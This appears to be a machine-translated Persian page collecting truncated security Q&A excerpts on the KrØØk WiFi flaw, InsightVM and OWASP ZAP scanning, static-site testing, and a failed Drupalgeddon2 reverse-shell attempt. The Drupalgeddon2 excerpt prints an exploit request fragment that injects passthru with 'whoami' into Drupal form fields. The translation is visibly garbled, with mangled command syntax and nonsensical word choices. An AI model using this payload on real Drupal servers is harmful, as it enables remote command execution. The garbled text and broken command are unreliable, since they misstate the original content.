آسیب پذیری در تراشه های WiFi Broadcom و Cypress این امکان را برای مهاجمین در شبکه WiFi محلی شما فراهم می کند تا ترافیک اینترنت رمزگذاری شده WPA2 شما را رمزگشایی کنند. این شکم ، که به آسیب پذیری KrØØk (kr00k) مشهور است ، دارای عنوان CVE-2019-15126 ، ESET ، کشف کننده آسیب پذیری kr00k…
اعتبار لازم برای اسکن آسیب پذیری – InsightVM
من از InsightVM از Rapid7 برای اسکن آسیب پذیری های دارایی شرکتم استفاده می کنم. نتایج متفاوتی به شرح زیر بود: اگر من از "اسکن برنامه ریزی شده" استفاده می کردم ، نتیجه اسکن آسیب پذیری های صحیح را کشف می کند ، از جمله اطلاعات "موفقیت اعتبار" در صورت اتخاذ اسکن دستی ، دیدم…
اسکنر آسیب پذیری – اسکن منفعل در حال پیشرفت را در OWASP ZAP 2.9 متوقف کنید
من می خواهم بدانم که آیا کسی می داند که چگونه یک اسکن منفعل ZAP در حال پیشرفت را در نسخه 2.9 متوقف یا سرعت بخشد. من یک صف اسکن منفعل 64000+ دارم و به هیچ وجه سریع تخلیه نمی شود. من با رفتن به گزینه ها -> قوانین اسکن منفعل و تنظیم آستانه "خاموش"…
بهره برداری – ارسال یک فرمان پوسته معکوس از طریق آسیب پذیری drupalgeddon کارایی ندارد
من در حال تلاش برای استفاده از بهره برداری Drupalgeddon2 (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) در ماشین دروپال 7.57 اوبونتو هستم. -sur : //192.168.204.141/؟ q = user / password & name [%23post_render][] = passthru & name [%23type] = markup & name [%23markup] = whoami ' –data "form_id = user_pass & _triggering_element_name = name & _triggering_element_value = & name grep…
وب سایت ها – در هنگام تعقیب سایت استاتیک ، برای کدام آسیب پذیری وب باید آزمایش کنم؟
من یک وب سایت دارای صفحه استاتیک دارم که می خواهم آنرا متفرقه کنم. منظور من از این امر این است که سایت دیتابیس ندارد و هیچ زمینه ای برای ارسال ورودی کاربر به جز سرویس پرداخت شخص ثالث که به طور کامل توسط آنها مدیریت می شود ندارد. من قبلاً برنامه وب را انجام…